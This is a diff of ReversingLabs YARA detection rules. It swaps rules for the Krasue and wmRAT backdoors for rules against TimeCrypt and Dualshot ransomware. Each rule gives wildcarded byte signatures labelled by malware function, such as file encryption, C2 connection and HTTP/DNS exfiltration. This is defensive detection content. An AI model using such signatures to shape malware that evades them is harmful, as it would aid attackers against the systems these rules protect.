-            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4
-            ?? ?? ?? ?? 5B C3
+		$encrypt_files = {
+            16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E
+            5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ??
+            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ??
+            08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04
+            28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02
+            19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11
+            ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ??
+            2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $generate_system_id ) and ( $generate_encrypt_and_send_key ) and ( $get_encrypt_and_send_system_info ) and ( $copy_payload_into_allocated_memory ) and ( $execute_payload_from_temp )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Krasue backdoor."
+		description = "Yara rule that detects TimeCrypt ransomware."
 		author = "ReversingLabs"
-		id = "3187eebf-ef70-585f-85cf-5813025c785e"
-		date = "2024-03-04"
-		modified = "2024-03-04"
+		id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7"
+		date = "2021-12-06"
+		modified = "2021-12-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151"
+		logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Krasue"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TimeCrypt"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$switch_server = {
-            8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
-            15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ??
-            ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ??
-            66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00
-            C3
-        }
-		$get_hostname = {
-            41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31
-            FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ??
-            BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15
-            ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89
-            C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80
-            ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ??
-            ?? ?? 5B 5D 41 5C 41 5D C3
-        }
-		$start_server_p1 = {
-            41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D
-            4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05
-            ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78
-            ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ??
-            ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ??
-            ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ??
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89
-            E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89
-            C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ??
-            80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ??
-            ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE
-        }
-		$start_server_p2 = {
-            66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ??
-            66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75
-            ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75
-            ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7
-            F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04
-            48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6
-            89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2
-            AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44
-            8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83
-            EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ??
-            ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48
-            83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
+		$find_files = {
+            7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09
+            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A
         }
-		$start_server_p3 = {
-            85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
-            ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ??
-            ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F
-            85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B
-            7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8
-            ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ??
-            ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89
-            EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85
+		$encrypt_files = {
+            02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F
+            ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F
+            ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A
         }
-		$send_encrypt = {
-            E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7
-            4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44
-            89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE
-            4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ??
-            ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$send_http_request = {
+            1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19
+            03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ??
+            ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
         }
-		$notify_server = {
-            48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48
-            89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48
-            83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ??
-            8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+		$send_dns_request = {
+            1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19
+            72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            26 DE ?? 26 DE ?? 2A
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $switch_server ) and ( $get_hostname ) and ( all of ( $start_server_p* ) ) and ( $send_encrypt ) and ( $notify_server )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $send_http_request ) and ( $send_dns_request )
 }
-rule REVERSINGLABS_Win64_Backdoor_Wmrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects wmRAT backdoor."
+		description = "Yara rule that detects Dualshot ransomware."
 		author = "ReversingLabs"
-		id = "9ae75871-b08f-52cc-8588-a444d13ecd89"
-		date = "2025-03-17"
-		modified = "2025-03-17"
+		id = "17828c85-0f1b-581b-842a-24e6f26e0b4d"
+		date = "2020-11-20"
+		modified = "2020-11-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.wmRAT.yara#L1-L144"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "23aadaf1571f23b3f02191e3079171c981d4969d0bd266d6db8c95fc091a1606"
+		logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "wmRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dualshot"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$connect_to_c2 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
-            A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 66 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 66 A3 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 A3 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C8 ?? 8D
-            4C 24 ?? A3 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 32 C0 EB ?? 8D 4C 24 ?? C6 05
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B0 ?? 8B 4C 24 ?? 64 89 0D
-            ?? ?? ?? ?? 59 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+		$internal_encrypt_file = {
+            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28
+            ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ??
+            ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26
+            DE ?? 2A
         }
-		$find_files_and_get_file_data_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? ??
-            ?? 64 A3 ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 3B C1 74
-            ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? F6 84 24 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5
-            8B 0D ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 89 84 24 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
-            ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 8C
-        }
-		$find_files_and_get_file_data_p2 = {
-            24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B
-            C3 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 9C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B
-            CB 75 ?? 2B C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 94
-            24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5 8D 8C 24 ?? ?? ?? ??
-            51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D5 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? 51 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24
-            ?? ?? ?? ?? ?? 8B 4C 24 ?? 52 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8D
-            4C 24 ?? 3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8B CC 89 64 24 ?? 68 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? FF 05 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 89 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24
-        }
-		$find_files_and_get_file_data_p3 = {
-            3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 83 EC ?? 8D 84 24 ?? ?? ?? ?? 8B CC 89 64 24 ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C0 0F B7 D0 8B C2 C1 E2 ?? 0B C2 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
-            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 48 ?? 83 CA ?? F0 0F C1 11 4A 85 D2 7F ?? 8B 08
-            8B 11 50 8B 42 ?? FF D0 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 8B
